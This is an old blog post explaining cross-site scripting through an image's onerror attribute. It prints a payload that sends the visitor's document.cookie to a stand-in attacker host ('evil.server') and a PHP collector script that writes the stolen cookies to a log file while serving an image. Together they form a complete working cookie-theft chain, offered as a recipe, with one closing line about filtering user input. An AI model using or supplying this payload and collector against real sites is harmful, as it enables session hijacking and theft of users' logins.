XSS with Img OnError attribute
March 19th, 2008 by Aaron
So much of my time is spent worrying over the src or href tags on images and links - that I sometimes forget about the other attributes.
Imagine being able to make an image which has no black-flagged content in the src but yet can still make a remote request, logging the user’s cookie information? Thats right - this can be done - using the ‘onerror’ attribute of an image.
What you need to do is to create an image link that is obviously broken or empty. Then, javascript handles such events by throwing an error for that element. Add an item to the onerror attribute to request a remote URL as your images src - which you add on document.cookie. The remote script logs all requests, and then displays an image.
Check out the code below:
Source page without proper filtering:
1 2 3 4 5 6 7 | <html> <body> <h1>test</h1> <h2>asdf</h2> <img src="" onerror="this.src='http://evil.server/exploit.php?'+document.cookie" /> </body> </html> |
Then, on evil.server, place your image. Finally, top it off with the following code in exploit.php
1 2 3 4 5 6 7 8 | <?php $image_path = 'test.jpg'; header('Accept-Ranges: bytes'); header('Content-Length: ' . filesize($image_path)); header('Keep-Alive: timeout=15, max=2469'); echo file_get_contents($image_path); file_put_contents("cookieLog.txt", $_SERVER['REQUEST_URI']); ?> |
Easy as that. Just another reminder to properly filter your use submitted content.
Tags: javascript, PHP, security
This entry was posted on Wednesday, March 19th, 2008 at 6:34 pm and is filed under PHP • javascript • security. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.
Subscribe